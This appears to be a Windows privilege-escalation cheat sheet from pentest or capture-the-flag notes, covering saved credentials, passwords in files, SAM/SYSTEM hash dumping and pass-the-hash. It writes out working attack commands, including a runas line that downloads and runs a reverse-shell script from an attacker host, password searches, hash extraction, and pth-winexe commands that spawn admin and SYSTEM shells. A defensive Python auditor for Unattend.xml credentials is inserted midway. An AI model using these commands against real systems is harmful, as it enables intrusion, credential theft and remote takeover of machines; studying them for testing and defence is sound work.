#Check if there are stored credentials:
cmdkey /list
#Suppose you find stored credentials for the user ACCESS\Administrator.
#You can use them to run commands as Administrator:
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Desktop\root.txt"
#Or use them to spawn a reverse shell (Nishang shell not on the victim machine, fetched from the attacker host):
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.11/shell.ps1')"
#Or use them to spawn a reverse shell (Nishang shell already on the victim machine):
runas /user:ACCESS\administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\Users\security\AppData\Local\Temp\Invoke-PowerShellTcp.ps1"
#msfvenom shell:
runas /user:ACCESS\administrator /savecred "C:\Temp\reverse.exe"
PASSWORDS IN FILES:
#Check whether an Unattend.xml file exists. It may contain passwords or other sensitive info. winPEAS also reports this file.
#You can also search for it manually:
dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt
#If you find the admin password, you can use winexe to log in as admin:
winexe -U 'admin%pass' //10.10.10.10 cmd.exe
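As an added, defender-side example (not part of the original notes): a small Python auditor that parses an Unattend.xml answer file and reports every credential left in it. Windows Setup stores a password whose `<PlainText>` is false as base64 of the UTF-16LE string password + "Password" (AutoLogon) or password + "AdministratorPassword"; that obfuscation is reversible by design, so such a file must be deleted and the credential rotated. The XML sample is constructed.

```python
import base64
import xml.etree.ElementTree as ET

NS = "urn:schemas-microsoft-com:unattend"
# Suffix Windows Setup appends to a password before UTF-16LE + base64 encoding
# when <PlainText> is false, keyed by the element that holds the password.
SUFFIXES = {"Password": "Password", "AdministratorPassword": "AdministratorPassword"}

# Constructed sample answer file, not taken from any real host. The AutoLogon
# value is base64(UTF-16LE("Summer2024" + "Password")).
SAMPLE_UNATTEND = f"""<unattend xmlns="{NS}">
  <AutoLogon>
    <Password>
      <Value>UwB1AG0AbQBlAHIAMgAwADIANABQAGEAcwBzAHcAbwByAGQA</Value>
      <PlainText>false</PlainText>
    </Password>
  </AutoLogon>
  <UserAccounts>
    <AdministratorPassword>
      <Value>Winter2024!</Value>
      <PlainText>true</PlainText>
    </AdministratorPassword>
  </UserAccounts>
</unattend>
"""


def decode_value(tag: str, value: str, plaintext: bool) -> str:
    """Recover the credential in a <Value>; the obfuscation is reversible by design."""
    if plaintext:
        return value
    decoded = base64.b64decode(value).decode("utf-16-le")
    suffix = SUFFIXES[tag]
    return decoded[:-len(suffix)] if decoded.endswith(suffix) else decoded


def audit_unattend(xml_text: str) -> list:
    """List every credential left in the answer file so it can be removed and rotated."""
    root = ET.fromstring(xml_text)
    findings = []
    for tag in SUFFIXES:
        for elem in root.iter(f"{{{NS}}}{tag}"):
            value = (elem.findtext(f"{{{NS}}}Value") or "").strip()
            if not value:
                continue  # empty <Value>: nothing stored
            # Simplification (assumption): a missing <PlainText> is treated as plain text.
            plaintext = (elem.findtext(f"{{{NS}}}PlainText") or "true").strip().lower() == "true"
            findings.append({"field": tag, "obfuscated": not plaintext,
                             "credential": decode_value(tag, value, plaintext)})
    return findings
```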
SAM & SYSTEM:
Windows stores password hashes in the Security Account Manager (SAM). These hashes are encrypted with a key that can be found in the SYSTEM file. With read permission on both files you can extract the hashes. Both files are located in C:\Windows\System32\config and are locked while Windows is running, but backup copies may exist in the C:\Windows\Repair or C:\Windows\System32\RegBack directory.
#You can use samdump or pwdump to extract the hashes from the two files:
python pwdump.py SYSTEM SAM
#Crack the hashes with JtR or Hashcat
#Then use winexe with the recovered password to spawn a shell
PASS THE HASH:
Windows accepts hashes instead of passwords to authenticate to a number of services. A modified version of winexe, pth-winexe, spawns a command prompt using the admin user's hash.
#You don't need to crack the hashes.
#This gives an admin shell:
pth-winexe -U 'admin%fullHash' //10.10.10.10 cmd.exe
#This gives a SYSTEM shell:
pth-winexe -U 'admin%fullHash' --system //10.10.10.10 cmd.exe